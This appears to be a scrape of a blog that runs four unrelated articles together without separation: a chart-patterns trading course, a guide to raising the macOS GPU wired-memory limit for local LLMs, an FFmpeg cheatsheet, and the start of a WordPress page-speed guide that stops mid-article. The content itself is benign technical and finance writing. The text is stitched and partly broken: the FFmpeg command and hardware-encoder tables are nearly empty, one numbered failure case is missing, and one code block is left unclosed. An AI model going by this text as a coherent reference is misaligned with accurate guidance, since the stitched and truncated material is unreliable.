Chart Patterns Course. This 10-chapter series is designed for people who want something stricter than retail pattern folklore and more practical than pure academic dismissal. The goal is simple: understand what chart patterns describe, when they are useful, when they fail, and how to turn them into disciplined trading decisions without pretending that triangles have supernatural powers.
A proper chart-patterns course is not a gallery of shapes. It is a framework for context, evidence, execution, and risk.
What This Course Covers
Most chart-pattern courses jump from shape recognition straight to trade entry, as if the market exists solely to reward anyone who spots a head and shoulders before breakfast. This course takes the opposite route. We begin with definitions and market structure, move through reversal and continuation setups, then spend serious time on breakouts, timeframes, regime filters, sizing, expectancy, evidence, backtesting, and professional deployment. In other words, the shapes are only the beginning.
The material is grounded in a mix of practitioner and academic sources. You will see classic references where terminology matters, but the course leans on evidence from Andrew Lo, Harry Mamaysky, Jiang Wang, Carol Osler, modern support-and-resistance studies, trend-following research from AQR, and institutional material from CME, FINRA, the SEC, and ESMA. That balance matters. Pattern trading becomes dangerous when students are given the vocabulary of technical analysis without the discipline of risk management and the humility of evidence.
How To Use The Series
Read the course in order if you are new to the topic. If you already trade patterns, Chapters 7 through 10 will probably hurt your feelings in a productive way because they focus on the part that actually decides whether a strategy survives: stop placement, position sizing, cost drag, test design, execution logic, and review discipline. The market does not care how beautiful your ascending triangle looked on TradingView if the setup was taken in the wrong regime with a stop parked exactly where everyone else parked theirs.
Each chapter includes one core illustration, one focused lesson, and a short summary takeaway at the bottom. Every chapter also links to the previous chapter, the next chapter, and this full course page so the structure behaves like a proper course rather than a pile of disconnected blog posts.
This course is for discretionary traders who want better structure, system builders who want cleaner definitions, and beginners who would rather learn the hard parts before the market teaches them using actual money. It is not for people who want a magic success rate, a single indicator to bless every trade, or a story about how “smart money” secretly paints every chart pattern by hand like a villain in a low-budget thriller.
This course is part of the finance content on SudoAll and is built from the source video, independent research, and additional primary material from academic and institutional references.
Full course here: Chart Patterns Course – Evidence, Execution, and Risk. If you want the full 10-chapter version with table of contents, previous/next chapter navigation, and dedicated lessons on risk, backtesting, and evidence, start there after this introduction.
Chart patterns are the finance equivalent of seeing constellations. Sometimes the stars really do line up, but only if you stop pretending every triangle is destiny. Fortune Talks’ long YouTube course gets one important thing right: patterns are visual summaries of supply, demand, hesitation, and breakout pressure. Where most beginner courses go wrong is turning that into a treasure map. A head and shoulders is not money. It is a conditional setup that needs trend context, participation, and disciplined execution.
Chart patterns are not magic shapes. They are compressed pictures of crowd behaviour, liquidity, and failed auctions.
What Chart Patterns Really Capture
At their best, chart patterns compress crowd behaviour into shapes traders can act on. Flags and triangles describe pauses inside a trend. Double tops, double bottoms, and head-and-shoulders structures describe failed auctions where one side is losing control. Andrew Lo, Harry Mamaysky, and Jiang Wang tried to move this subject from folklore to measurement by formalising pattern recognition on decades of U.S. stock data.
That is the key correction to the “all patterns work” myth. The serious claim is not that geometry predicts price by magic. The serious claim is that recurring structures can shift the distribution of outcomes. Kahneman’s warning in Thinking, Fast and Slow fits perfectly here: the human brain loves fast pattern recognition, but markets punish fast certainty. A chart pattern is a hypothesis, not a verdict.
What Is the Success Rate, Actually?
The honest answer is that there is no single success rate worth tattooing on your keyboard. Results vary by market, timeframe, execution quality, fees, and whether you trade the breakout, the close, or the retest. The respectable literature says three useful things. First, patterns can contain information. Second, that information is conditional rather than universal. Third, implementation quality decides whether the edge survives transaction costs.
“These tests strongly support the claim that support and resistance levels help predict intraday trend interruptions for exchange rates.” – Carol Osler, Federal Reserve Bank of New York
Osler’s work matters because it tests signals used by real market participants rather than fantasy charts drawn after the move. More recent quantitative work on intraday support and resistance has pointed in the same direction.
The pattern-specific evidence is mixed but not empty. In research on U.S. equities, Savin, Weller, and Zvingelis reported that head-and-shoulders signals improved risk-adjusted returns when used conditionally, but they did not support a naive stand-alone trading religion. That is the real lesson. Patterns can add information. They rarely deserve to be your entire trading system.
The Failure Cases Beginners Learn the Hard Way
Case 1: Entering before the breakout is confirmed
The video correctly emphasises breakout logic. The trap is anticipation. Traders see an ascending triangle, jump early, and call it conviction. The market calls it liquidity.
# Bad: trade the pattern before confirmation
if pattern == "ascending_triangle":
    buy()

# Better: require a decisive close and participation
if pattern == "ascending_triangle" and close > resistance and volume > 1.5 * avg_volume_20:
    buy()
Premature entries convert a probabilistic setup into a coin flip with worse pricing.
Case 2: Ignoring the higher timeframe regime
A bullish flag inside a clean weekly uptrend is not the same object as a bullish flag under a falling 200-day moving average. One is continuation. The other is often a dead-cat drawing with better marketing.
# Bad: every flag gets treated equally
signal = detect_flag(data)
# Better: trade with regime
signal = detect_flag(data)
trend_ok = close > ema_50 and ema_50 > ema_200
if signal and trend_ok:
    buy()
Case 3: Pretending measured-move targets beat transaction costs by default
This is where most course material becomes decorative. A 1.2R setup on a noisy intraday chart can look beautiful and still be useless after spread, slippage, and misses.
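To make the cost-drag point concrete, here is a back-of-envelope sketch. The 50% win rate and the 0.15R round-trip cost are illustrative numbers chosen for the arithmetic, not estimates from the course:

```python
def net_expectancy_r(win_rate, reward_r, cost_r):
    # Expectancy in R per trade: winners pay reward_r, losers cost 1R,
    # and every trade pays cost_r in spread and slippage regardless of outcome
    gross = win_rate * reward_r - (1 - win_rate) * 1.0
    return gross - cost_r

# A 1.2R target at a 50% win rate looks positive before costs...
print(round(net_expectancy_r(0.50, 1.2, 0.00), 2))  # 0.1
# ...and negative after a plausible 0.15R of round-trip cost drag
print(round(net_expectancy_r(0.50, 1.2, 0.15), 2))  # -0.05
```

A tenth of an R of edge is exactly the kind of edge that costs erase first, which is why the cost assumption belongs in the plan, not in the post-mortem.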
This is the part beginners skip because it is less exciting than spotting a cup and handle. It is also the part that decides whether you stay in the game.
Most pattern failures are implementation failures: early entry, wrong regime, or a cost structure that eats the edge.
Best Ways to Implement Chart Patterns in Practice
If you actually want to use the ideas from the course, do it like a process engineer, not a pattern tourist. Restrict yourself to liquid instruments. Start with regime classification. Define the trigger mechanically. Require confirmation. Then place the stop where the thesis is invalidated, not where your ego gets uncomfortable. The video is right that timeframes matter: daily and four-hour structures are usually more reliable than frantic one-minute pattern hunting because more participants see them and cost drag is smaller.
Step 1: Restrict the universe. Focus on liquid names or liquid index products.
Step 2: Start with regime. Continuation patterns need trend persistence; reversal patterns need exhaustion plus failed follow-through.
Step 3: Define the trigger mechanically. Use a closing break beyond the boundary, a retest rule, or both.
Step 4: Require confirmation. Volume expansion and volatility contraction before breakout help filter noise.
Step 5: Size the trade from the stop. Risk per trade should be fixed before the order is sent.
def trade_pattern(pattern, data):
    if not pattern.confirmed_close:
        return None
    if not data.regime_is_aligned:
        return None
    if data.breakout_volume < 1.5 * data.avg_volume_20:
        return None
    entry = data.close
    stop = pattern.invalidation_level
    target = entry + 2 * (entry - stop)
    return {"entry": entry, "stop": stop, "target": target}
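Step 5 above, sizing the trade from the stop, can also be written down as a small helper. The 1% risk fraction and the prices are illustrative numbers, not recommendations:

```python
def position_size(equity, risk_fraction, entry, stop):
    # Fixed-fractional sizing: risk a set fraction of equity per trade,
    # derived from the distance between entry and invalidation
    risk_amount = equity * risk_fraction
    per_unit_risk = abs(entry - stop)
    if per_unit_risk == 0:
        raise ValueError("entry and stop must differ")
    return int(risk_amount / per_unit_risk)

# Risking 1% of a 50,000 account with entry at 102 and stop at 98
print(position_size(50_000, 0.01, 102.0, 98.0))  # 125
```

The point of the helper is the order of operations: the stop comes first, the size is derived from it, and the order is sent last.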
A useful chart pattern is a checklist with an invalidation level, not a doodle with hope attached.
When Chart Patterns Are Actually Fine
Chart patterns are perfectly respectable when used as a language for trade location, watchlist construction, and risk definition. They are especially useful for swing traders who need a structured way to organise entries and invalidation points. They are much less convincing as a stand-alone alpha source in fast, fee-heavy intraday trading. Put differently: patterns work better as a decision framework than as a superstition.
If you cannot explain the regime, trigger, invalidation, and cost assumptions, you do not have a setup yet.
What to Check Right Now
Backtest one pattern at a time with real spreads and slippage before adding it to your playbook.
Separate continuation from reversal setups because their failure mechanics are different.
Track expectancy, not just win rate. A lower win rate can still be superior if average winners are materially larger than average losers.
Use daily or four-hour charts first if you are learning. Higher timeframes usually mean cleaner structure and lower cost drag.
Review every false breakout to see whether volume, regime, or liquidity should have filtered it out.
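The expectancy point in the checklist is just arithmetic; a quick sketch with made-up numbers shows why win rate alone misleads:

```python
def expectancy_r(win_rate, avg_win_r, avg_loss_r):
    # Average R earned per trade: what you win times how often,
    # minus what you lose times how often
    return win_rate * avg_win_r - (1 - win_rate) * avg_loss_r

# A 40% win rate with 2.5R winners beats a 60% win rate with 0.8R winners
print(round(expectancy_r(0.40, 2.5, 1.0), 2))  # 0.4
print(round(expectancy_r(0.60, 0.8, 1.0), 2))  # 0.08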
Video Attribution
This article builds on the educational YouTube course below and adds the quantitative evidence, implementation rules, and failure analysis that most chart-pattern tutorials leave out.
There is a particular kind of modern disappointment that only happens on an Apple Silicon Mac. You have 16 GB of unified memory, your model file is “only” 11 GB on disk, LM Studio looks optimistic for a moment, and then the load fails like a Victorian gentleman fainting at the sight of a spreadsheet. The internet calls this “hidden VRAM”. That phrase is catchy, but it is also slightly nonsense. Your Mac does not have secret gamer VRAM tucked behind the wallpaper. What it has is a shared memory pool and a tunable guardrail for how much of that pool the GPU side of the system is allowed to wire down. Move the guardrail carefully and some local LLMs that previously refused to load will suddenly run. Move it carelessly and your machine turns into a very expensive beachball generator.
This is not free VRAM. It is a movable fence inside a shared pool.
The practical knob is iogpu.wired_limit_mb. On this 16 GB Apple Silicon Mac, the default is still the default from the video:
sysctl iogpu.wired_limit_mb
iogpu.wired_limit_mb: 0
That 0 means “use the system default policy”, not “unlimited”. For people running local models, that distinction matters. The interesting bit is that the policy is often conservative enough that a model which should fit on paper does not fit in practice once GPU allocations, KV cache, context length, the window server, and ordinary macOS overhead all take their cut. The result is a very familiar sentence: failed to load model.
What This Setting Actually Changes
Apple’s architecture is the key to understanding why this works at all. Unlike a desktop PC with separate system RAM and discrete GPU VRAM, Apple Silicon puts the CPU and GPU on one shared pool of unified memory, and Apple describes it exactly that plainly.
That one design decision explains both the magic and the pain. The magic is that Apple laptops and minis can run surprisingly capable local models without a discrete GPU at all. The pain is that every byte you hand to GPU-backed inference is a byte you are not handing to the rest of the operating system. This is capacity planning, not sorcery. Kleppmann would recognise it instantly from Designing Data-Intensive Applications: one finite resource, several hungry consumers, and trouble whenever you pretend the budget is not real.
The lower-level Metal API exposes the same idea in more formal language. Its recommendedMaxWorkingSetSize property is documented as an approximation of how much memory the device can allocate without affecting its runtime performance.
Notice the wording: without affecting runtime performance. Apple is not promising a hard technical ceiling. It is describing a safety line. The iogpu.wired_limit_mb trick is, in effect, you saying: “thank you for the safety line, I would like to move it because I know what else is running on this machine”.
If you want to see the same concept from code rather than from a slider in LM Studio, a tiny Metal program can query the recommended budget directly:
import Metal

if let device = MTLCreateSystemDefaultDevice() {
    let bytes = device.recommendedMaxWorkingSetSize
    let gib = Double(bytes) / 1024.0 / 1024.0 / 1024.0
    print(String(format: "Recommended GPU working set: %.2f GiB", gib))
}
That value is the polite answer. iogpu.wired_limit_mb is how you become impolite, but hopefully still civilised.
Why Models Fail Before RAM Looks Full
Most newcomers look at the model file size and do schoolboy arithmetic: “11 GB file, 16 GB machine, therefore fine.” That works right up until reality arrives with a clipboard. Runtime memory use includes the model weights, the KV cache, backend allocations, context-length overhead, app overhead, and the rest of macOS. LM Studio explicitly gives you a way to inspect this before you pull the pin:
“Preview memory requirements before loading a model using --estimate-only.” – LM Studio Docs, lms load
That is not a decorative feature. Use it. Also note LM Studio’s platform advice for macOS: 16GB+ RAM recommended, with 8 GB machines reserved for smaller models and modest contexts. The point is simple: local inference is not decided by model download size alone. It is decided by total live working set.
# Ask LM Studio for the memory estimate before loading
lms load --estimate-only openai/gpt-oss-20b
# Lower context if the estimate is close to the edge
lms load --estimate-only openai/gpt-oss-20b --context-length 4096
# If needed, reduce GPU usage rather than insisting on "max"
lms load openai/gpt-oss-20b --gpu 0.75 --context-length 4096
That last point is underappreciated. Sometimes the right answer is not “raise the wired limit”. Sometimes the right answer is “pick a saner context length” or “run a smaller quant”. Engineers love hidden toggles because they feel like boss fights. In practice, boring budgeting wins.
The Failure Modes Nobody Mentions in the Thumbnail
The YouTube version of this story is understandably upbeat: type command, load bigger model, cue triumphant tokens per second. The real world deserves a sterner briefing. Three failure cases show up over and over.
Case 1: The Model File Fits, But the Live Working Set Does Not
The trigger is a model whose weights fit comfortably on disk, but whose runtime footprint exceeds the combined budget once context and cache are included.
# Bad mental model:
# "The GGUF is 11 GB, so my 16 GB Mac can obviously run it."
model_weights_gb = 11.2
kv_cache_gb = 1.8
backend_overhead_gb = 0.8
desktop_overhead_gb = 2.0
total_live_working_set = (
    model_weights_gb +
    kv_cache_gb +
    backend_overhead_gb +
    desktop_overhead_gb
)
print(total_live_working_set)  # 15.8 GB, and we still have no safety margin
What happens next is either a clean refusal to load or a dirty scramble into memory pressure. The correct pattern is to estimate first, shrink context if necessary, and accept that a lower-bit quant is often the smarter answer than a higher limit.
# Better approach: estimate, then choose the model tier that fits
lms load --estimate-only qwen/qwen3-8b
lms load --estimate-only openai/gpt-oss-20b --context-length 4096
# If the estimate is borderline, step down a tier
lms load qwen/qwen3-8b --gpu max --context-length 8192
Case 2: You Raise the Limit So High That macOS Starts Fighting Back
This happens when you treat unified memory as if it were dedicated VRAM and leave the operating system too little breathing room. Headless Mac minis tolerate this better. A laptop with browsers, Finder, Spotlight, and a normal human life happening on it does not.
# Aggressive and often reckless on a 16 GB machine
sudo sysctl iogpu.wired_limit_mb=16000
# Then immediately try to load a borderline model
lms load openai/gpt-oss-20b --gpu max
The machine may still succeed, which is what makes this dangerous. Success under orange memory pressure is not proof of wisdom. It is proof that you got away with it once. The better pattern is to leave deliberate headroom for the OS and keep a close eye on Activity Monitor while you test.
# A more conservative example for a 16 GB Mac
sudo sysctl iogpu.wired_limit_mb=14336
# Verify the setting
sysctl iogpu.wired_limit_mb
# Then test with a realistic context length
lms load openai/gpt-oss-20b --context-length 4096
Case 3: You Optimise the Wrong Thing and Ignore Context Length
A surprisingly common mistake is to chase the biggest possible model whilst leaving an unnecessarily large context window enabled. KV cache is not free. A smaller context often buys you more stability than another dramatic sysctl ever will.
# Bad: max everything, then act surprised
lms load some-14b-model --gpu max --context-length 32768
# Better: fit the workload, not your ego
lms load some-14b-model --gpu max --context-length 4096
lms load some-8b-model --gpu max --context-length 8192
This is the computing equivalent of bringing a grand piano to a pub quiz. Impressive, yes. Appropriate, no.
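The KV-cache cost is easy to estimate from first principles. The layer and head counts below describe a hypothetical 8B-class model, not any specific release:

```python
def kv_cache_gib(n_layers, n_kv_heads, head_dim, context_len, bytes_per_elem=2):
    # K and V tensors per layer: context_len * n_kv_heads * head_dim elements each,
    # so the factor of 2 covers keys plus values
    total_bytes = 2 * n_layers * context_len * n_kv_heads * head_dim * bytes_per_elem
    return total_bytes / (1024 ** 3)

# Hypothetical 8B-class model: 32 layers, 8 KV heads of dim 128, fp16 cache
print(kv_cache_gib(32, 8, 128, 32768))  # 4.0 GiB at 32k context
print(kv_cache_gib(32, 8, 128, 4096))   # 0.5 GiB at 4k context
```

Under those assumptions, dropping from 32k to 4k context frees several gigabytes, which is more than most wired-limit adjustments will ever buy you.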
The danger sign is not failure to load. It is successful loading with no oxygen left for the rest of the machine.
How to Tune It Without Turning Your Mac Into a Toaster
The safe way to use this setting is incremental, reversible, and boring. Those are good qualities in systems work. Start from default, raise in steps, test one model at a time, and watch memory pressure rather than vibes.
Check the current value. If it is 0, you are on the system default policy.
Pick a target that still leaves real headroom. On a 16 GB machine, 14 GB is already adventurous. On a dedicated headless box, you can be bolder.
Restart the inference app. Tools like LM Studio need to re-detect the budget.
Load with a realistic context length. Do not benchmark recklessness.
Reset to default if the machine becomes unpleasant. A responsive Mac beats a heroic screenshot.
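Picking the target value is just headroom arithmetic. This tiny sketch assumes you budget headroom in whole gigabytes; the two outputs match the 14336 and 12288 values used elsewhere in this article:

```python
def wired_limit_mb(total_ram_gb, os_headroom_gb):
    # Choose a wired limit by subtracting explicit OS headroom from total RAM
    return int((total_ram_gb - os_headroom_gb) * 1024)

# On a 16 GB machine: adventurous (2 GB headroom) vs cautious (4 GB headroom)
print(wired_limit_mb(16, 2))  # 14336
print(wired_limit_mb(16, 4))  # 12288
```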
# 1. Inspect current policy
sysctl iogpu.wired_limit_mb
# 2. Raise cautiously
sudo sysctl iogpu.wired_limit_mb=12288
# 3. Test, observe, then step up if needed
sudo sysctl iogpu.wired_limit_mb=14336
# 4. Return to default policy
sudo sysctl iogpu.wired_limit_mb=0
If you truly need this on every boot, automate it like any other operational setting. Treat it as host configuration, not as a ritual you half-remember from a video. But also ask the adult question first: if you need a startup hack to run the model comfortably, should you really be running that model on this machine?
The second practical tool is estimation. Run the estimator before the load, not after the error:
# Compare two candidates before wasting time
lms load --estimate-only qwen/qwen3-8b
lms load --estimate-only mistral-small-3.1-24b --context-length 4096
# Use the estimate to choose the smaller model or context
lms load qwen/qwen3-8b --gpu max --context-length 8192
Which Models Actually Make Sense on Different Apple Silicon Macs
This is the section everybody really wants. Exact numbers depend on quant format, context length, backend behaviour, and what else the machine is doing. But the tiers below are realistic enough to save people from magical thinking.
| Mac memory tier | Comfortable local LLM tier | Possible with tuning | Usually a bad idea |
| --- | --- | --- | --- |
| 16 GB | 3B to 8B models, 12B class with modest context | Some 14B to 20B quants if you raise the limit and stay disciplined | Large context 20B+, 30B-class models during normal desktop use |
| 24 GB | 8B to 14B models, many 20B-class quants | Some 24B to 32B models with sensible context | Treating it like a 64 GB workstation |
| 32 GB to 48 GB | 14B to 32B models comfortably, larger contexts for practical work | Some 70B quants on the upper end, especially on dedicated machines | Huge models plus giant context plus desktop multitasking |
| 64 GB and above | 30B to 70B-class quants become genuinely usable | Aggressive large-model experimentation on headless or dedicated Macs | Assuming every app uses memory exactly the same way |
If you want a one-line rule of thumb, it is this: on a 16 GB machine, think “excellent 7B to 8B box, adventurous 14B box, occasional 20B parlour trick”. On a 24 GB or 32 GB machine, the world gets much nicer. On a 64 GB+ Mac Studio, the conversation changes from “can I load this?” to “is the speed good enough for the inconvenience?”
Also remember that smaller, better-tuned models often beat larger awkward ones for day-to-day coding, search, summarisation, and chat. A responsive 8B or 14B model you actually use is more valuable than a 20B model that only runs when the stars align and Chrome is closed.
The machine class matters more than the myth. Fit the model tier to the memory tier.
When the Default Setting Is Actually Fine
The balanced answer is that the default exists for good reasons. If your Mac is a general-purpose laptop, if you care about battery life and responsiveness, if you run multiple heavy apps at once, or if your local LLM work is mostly 7B to 8B models, leave the setting alone. The system default is often the correct trade-off.
This is also true if your workload is bursty rather than continuous. For occasional summarisation, coding assistance, or local RAG over documents, it is usually better to pick a slightly smaller model and preserve the machine’s overall behaviour. The hidden cost of “bigger model at any price” is that you stop trusting the computer. Once a laptop feels brittle, you use it less. That is bad engineering and worse ergonomics.
There is another subtle point. The wired-limit trick helps most when the machine is effectively dedicated to inference: a headless Mac mini, a quiet box on the shelf, a Mac Studio cluster, or a desktop session where you are willing to treat inference as the primary job. The closer your Mac is to a single-purpose appliance, the more sense this tweak makes.
What To Check Right Now
Check the current policy: run sysctl iogpu.wired_limit_mb and confirm whether you are on the default setting.
Estimate before loading: use lms load --estimate-only so you know the model’s live working set before you commit.
Audit context length: if you are using 16k or 32k context by habit, ask whether 4k or 8k would do the same job.
Watch memory pressure, not just free RAM: Activity Monitor tells you more truth than a single headline number.
Leave deliberate headroom: a model that barely runs is not a production setup, it is a stunt.
Reset when testing is over: sudo sysctl iogpu.wired_limit_mb=0 is a perfectly respectable ending.
Most wins come from estimation, context discipline, and realistic model choice, not from one dramatic command.
The honest headline, then, is better than the clickbait one. Your Mac does not have hidden VRAM waiting to be unlocked like a cheat code in a 1998 driving game. What it has is unified memory, a conservative GPU working-set policy, and enough flexibility that informed users can rebalance the machine for local inference. That is genuinely useful. It is also exactly the sort of useful that punishes people who confuse “possible” with “free”.
Video Attribution
This article was inspired by Alex Ziskind’s video on adjusting the GPU wired-memory limit for local LLM use on Apple Silicon Macs. The video is worth watching for the quick demonstration, particularly if you want to see the behaviour in LM Studio before you touch your own machine.
FFmpeg is what happens when a Swiss Army knife gets a PhD in multimedia and then refuses to use a GUI. It can inspect, trim, remux, transcode, filter, normalise, package, stream, and automate media pipelines with almost rude efficiency. The catch is that it speaks in a grammar that is perfectly logical and completely uninterested in your vibes. Put one option in the wrong place and FFmpeg will not “figure it out”. It will hand you a lesson in command-line causality.
This version is built to be kept open in a tab: a smarter cheatsheet, a modern streaming reference, a compact guide to the commands worth memorising, and a curated collection of official docs plus a few YouTube resources that are actually worth your time. We will cover the fast path, the dangerous path, and the production path.
FFmpeg in one picture: streams go in, decisions get made, codecs either behave or get replaced.
First Principles: How FFmpeg Actually Thinks
Most FFmpeg confusion begins with the wrong mental model. Humans think in files. FFmpeg thinks in inputs, streams, codecs, filters, mappings, and outputs. A single file can contain several streams: video, multiple audio tracks, subtitles, chapters, timed metadata. FFmpeg lets you inspect that structure, choose what to keep, decode only what needs changing, then write a new container deliberately.
The core trio is simple. ffmpeg transforms media. ffprobe tells you what is actually in the file. ffplay previews quickly. The smartest FFmpeg habit is also the least glamorous: ffprobe first, ffmpeg second. Guessing stream layout is how people end up with silent video, the wrong commentary track, or subtitles that evaporate on contact with MP4.
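The ffprobe-first habit is easy to script. This sketch assumes ffprobe's JSON output mode (-print_format json -show_streams) and shows only the parsing side, with an abbreviated sample of that output inlined:

```python
import json

def summarize_streams(ffprobe_json):
    # Reduce ffprobe's -show_streams JSON to (index, type, codec) triples
    streams = json.loads(ffprobe_json)["streams"]
    return [(s["index"], s["codec_type"], s.get("codec_name", "?")) for s in streams]

# Abbreviated example of what ffprobe -print_format json -show_streams emits
sample = (
    '{"streams":['
    '{"index":0,"codec_type":"video","codec_name":"h264"},'
    '{"index":1,"codec_type":"audio","codec_name":"aac"},'
    '{"index":2,"codec_type":"subtitle","codec_name":"subrip"}]}'
)
print(summarize_streams(sample))
# [(0, 'video', 'h264'), (1, 'audio', 'aac'), (2, 'subtitle', 'subrip')]
```

Three lines of parsing beats guessing which of five audio tracks is the commentary.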
“As a general rule, options are applied to the next specified file. Therefore, order is important, and you can have the same option on the command line multiple times.” – FFmpeg Documentation, ffmpeg manual
That rule explains most self-inflicted FFmpeg pain. Input options belong before the input they affect. Output options belong before the output they affect. You are not writing prose. You are wiring a pipeline.
The other distinction worth burning into memory is container versus codec. MP4, MKV, MOV, WebM, TS, and M4A are containers. H.264, HEVC, AV1, AAC, Opus, MP3, ProRes, and DNxHR are codecs. Containers are boxes. Codecs are how the contents were compressed. A huge fraction of “FFmpeg is broken” reports are really “I changed the box and forgot the contents still have rules”.
The command-flow model: inspect streams, decide what gets copied, decide what gets filtered, then write the output on purpose.
The Fast Lane: Steal These Commands First
If you only memorise a dozen FFmpeg moves, make them these. They cover the majority of real-world jobs: inspect, copy, trim, transcode, subtitle, extract, package, and deliver.
| Job | Command | Use it when |
| --- | --- | --- |
| Inspect a file properly | ffprobe -hide_banner input.mkv | You want the truth about streams before touching anything. |
“Streamcopy is useful for changing the elementary stream count, container format, or modifying container-level metadata. Since there is no decoding or encoding, it is very fast and there is no quality loss.” – FFmpeg Documentation, ffmpeg manual
If you remember one performance trick, remember -c copy. It is the difference between “done in a second” and “let me hear all your laptop fans introduce themselves”.
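If you script remuxes, keep the streamcopy flag front and centre. A minimal command-builder sketch (the helper name is ours, not an FFmpeg API; run the result with subprocess.run(..., check=True)):

```python
def remux_cmd(src, dst):
    # Streamcopy: change the container without decoding or re-encoding
    return ["ffmpeg", "-hide_banner", "-y", "-i", src, "-c", "copy", dst]

# Inspect the command before running it
print(" ".join(remux_cmd("input.mkv", "output.mp4")))
# ffmpeg -hide_banner -y -i input.mkv -c copy output.mp4
```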
Modern FFmpeg: Streaming, Packaging, and Delivery in 2026
This is where a lot of older FFmpeg write-ups feel dusty. Modern usage is not just “convert AVI to MP4”. It is packaging for adaptive streaming, feeding live ingest pipelines, generating web-safe delivery files, and choosing the correct transport for the job instead of shouting at RTMP because it was popular in 2014.
“WebRTC (Real-Time Communication) muxer that supports sub-second latency streaming according to the WHIP (WebRTC-HTTP ingestion protocol) specification.” – FFmpeg Formats Documentation, WHIP muxer
That is the modern landscape in miniature. FFmpeg is not only a transcoder. It is a packaging and transport tool. Use the right mode for the latency, compatibility, and scale you actually need.
WHIP is interesting because it reflects the current internet, not the old one. If your target is low-latency browser delivery, WHIP and WebRTC are now part of the real conversation, not just interesting acronyms for protocol collectors.
Modern FFmpeg is packaging plus transport plus compatibility engineering, not just transcoding.
Hardware Acceleration Without Lying to Yourself
Modern FFmpeg usage also means knowing when to use hardware encoders. They are fantastic when throughput matters: live streaming, batch transcoding, preview generation, cloud pipelines, and “I have 800 files and would prefer not to age visibly today”. They are not always the best answer for maximum compression efficiency or highest archival quality.
The practical rule is simple. If you need the best quality-per-bit, software encoders like libx264, libx265, and libaom-av1 still matter. If you need speed and acceptable quality, hardware encoders are often the right move.
| Platform | Common encoder | Example |
| --- | --- | --- |
| NVIDIA | h264_nvenc, hevc_nvenc, sometimes AV1 on newer cards | |
The mistake people make is assuming hardware encode means “same quality, just faster”. Often it means “faster, different tuning, sometimes larger bitrate for comparable quality”. Be honest about the trade-off. This is not a moral issue. It is an engineering one.
Failure Cases That Keep Reappearing
Hunt and Thomas argue in The Pragmatic Programmer that good tools reward understanding over superstition. FFmpeg is one of the clearest examples of that principle on the command line. Here are the mistakes that keep burning people because they look plausible until you understand what FFmpeg is actually doing.
Case 1: You Wanted Speed, but Also Expected Frame Accuracy
Putting -ss before -i is fast. It is often not frame-accurate. That is a feature, not a betrayal.
Case 3: FFmpeg Picked the Wrong Streams Because You Left It to Fate
Auto-selection works until the source has multiple languages, commentary, descriptive audio, or subtitles. At that point, the polite thing to do is map explicitly.
# Ambiguous and sometimes unlucky
ffmpeg -i movie.mkv -c copy output.mp4
# Better: map the streams you actually want
ffmpeg -i movie.mkv -map 0:v:0 -map 0:a:0 -c copy output.mp4
Filtergraphs stop being scary the moment you read them as labelled dataflow instead of punctuation.
The Best Collection to Bookmark
If you want the strongest FFmpeg learning stack from basic to advanced, use this order. Not because it is trendy, but because it respects how people actually learn complicated tools: truth first, intuition second, repetition third.
The rule is simple: use YouTube for intuition, use the official docs for truth. The people who confuse those two categories usually end up with very confident commands and very confusing output.
What to Check Right Now
Adopt one boring, reliable web delivery recipe – H.264, AAC, and -movflags +faststart will solve more problems than exotic cleverness.
Use ffprobe before every important transcode – that one habit prevents a ridiculous amount of avoidable breakage.
Reach for -c copy first when no transformation is needed – it is faster and lossless, which is suspiciously close to magic.
Move from RTMP-only thinking to transport-aware thinking – HLS for compatibility, DASH for adaptive packaging, SRT for rougher networks, WHIP for low-latency browser workflows.
Pick hardware encoders when throughput matters and software encoders when efficiency matters – this is the real trade-off, not ideology.
Build a private snippets file – five good FFmpeg recipes will do more for your sanity than fifty vague memories.
FFmpeg rewards the same engineering habit that every serious tool rewards: inspect first, be explicit, automate the boring parts, and choose the transport and packaging that fit the real system in front of you. Do that and FFmpeg stops feeling like cryptic wizardry and starts feeling like infrastructure. Which is exactly what it is.
WordPress ships slow. Not broken-slow, but “a friend who takes 4 seconds to answer a yes/no question” slow. The default stack serves every request through PHP, loads jQuery plus its migration shim for a site that hasn’t used jQuery 1.x in a decade, ships full-resolution images to mobile screens, and trusts the browser to figure out layout before it has seen a single pixel. Google’s PageSpeed Insights will hand you a score in the 40s and a wall of red, and you’ll spend an afternoon convinced the problem is your hosting. It is not. This guide walks through every layer of the fix, from OPcache to image compression to full-page static caching, and explains exactly why each one moves the needle.
From a 49 on mobile to 95+: what a full stack optimisation actually looks like.
What PageSpeed Is Actually Measuring
Before you touch a file, understand what you are chasing. PageSpeed Insights (backed by Lighthouse) reports five metrics, each targeting a distinct user experience moment:
First Contentful Paint (FCP) – the moment the browser renders any content at all. Dominated by render-blocking CSS and JS in the <head>.
Largest Contentful Paint (LCP) – when the biggest visible element finishes loading. Usually your hero image or a large heading. Google’s threshold for “good” is under 2.5 seconds.
Total Blocking Time (TBT) – the sum of all long tasks on the main thread between FCP and Time to Interactive. Every JavaScript file parsed synchronously contributes here. Zero is the target.
Cumulative Layout Shift (CLS) – how much the page jumps around as assets load. Images without explicit width and height attributes are the most common culprit. Target: under 0.1.
Speed Index – a composite of how quickly visible content populates: roughly the area above the visual-completeness curve, so the faster the page fills in, the lower the score.
“LCP measures the time from when the page first starts loading to when the largest image or text block is rendered within the viewport.” – web.dev, Largest Contentful Paint (LCP)
The audit starts with a fresh Chrome incognito load over a throttled 4G connection. Any caching your browser has built up is irrelevant; PageSpeed is measuring the cold-load experience of a first-time visitor on a mediocre phone connection. Every millisecond counts from the first TCP packet.
Layer 1: Images – The Biggest Win by Far
Images are almost always the single largest contributor to poor LCP on a self-hosted WordPress blog. A typical upload flow is: photographer exports a 4000×3000 JPEG at 90% quality, editor uploads it via the WordPress media library, WordPress generates a handful of named thumbnails but leaves the original untouched, and the theme serves the full 8 MB original to every visitor. The browser then scales it down in CSS. The bytes still travel across the wire.
Case 1: Full-Resolution Originals Served to Every Visitor
When a theme uses get_the_post_thumbnail_url() without specifying a size, or uses a custom field storing the original upload URL, WordPress happily hands out the unprocessed original.
# Find images over 200KB in your uploads directory
find /var/www/html/wp-content/uploads -name "*.jpg" -size +200k | wc -l
# Batch-resize and compress in place with ImageMagick
# Max 1600px wide, JPEG quality 75, strip metadata
find /var/www/html/wp-content/uploads -name "*.jpg" -o -name "*.jpeg" | \
xargs -P4 -I{} mogrify -resize '1600x>' -quality 75 -strip {}
find /var/www/html/wp-content/uploads -name "*.png" | \
xargs -P4 -I{} mogrify -quality 85 -strip {}
